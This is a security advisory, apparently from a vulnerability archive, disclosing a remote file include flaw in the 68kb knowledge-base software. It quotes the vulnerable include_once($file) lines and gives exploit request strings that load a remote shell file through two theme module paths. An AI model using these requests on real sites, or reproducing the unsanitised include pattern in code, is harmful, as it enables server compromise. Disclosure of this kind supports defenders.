68kb Multi Remote File Include

2010.03.28
Credit: ItSecTeam
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=========================================================================== ( #Topic : 68kb ( #Bug type : multi remote file include ( #Download : http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip ( #Advisory : =========================================================================== ( #Author : ItSecTeam ( #Email : Bug@ITSecTeam.com # ( #Website: http://www.itsecteam.com # ( #Forum : http://forum.ITSecTeam.com # ( #Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability27.htm ( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members! vul:=================================================================== path/themes/front/default/modules/show.php <?php include_once($file); ?> vul:=================================================================== path/themes/admin/default/modules/show.php <?php include_once($file); ?> --------------------------------------------------------------------- exploit:================================================================ path/themes/front/default/modules/show.php?file=shell.txt? path/themes/admin/default/modules/show.php?file=shell.txt? -------------------------------------- ItSecTeam_68kb.txt =========================================================================== ( #Topic : 68kb ( #Bug type : multi remote file include ( #Download : http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip ( #Advisory : =========================================================================== ( #Author : ItSecTeam ( #Email : Bug@ITSecTeam.com # ( #Website: http://www.itsecteam.com # ( #Forum : http://forum.ITSecTeam.com # ( #Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability27.htm ( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members! vul:=================================================================== path/themes/front/default/modules/show.php <?php include_once($file); ?> vul:=================================================================== path/themes/admin/default/modules/show.php <?php include_once($file); ?> --------------------------------------------------------------------- exploit:================================================================ path/themes/front/default/modules/show.php?file=shell.txt? path/themes/admin/default/modules/show.php?file=shell.txt? --------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top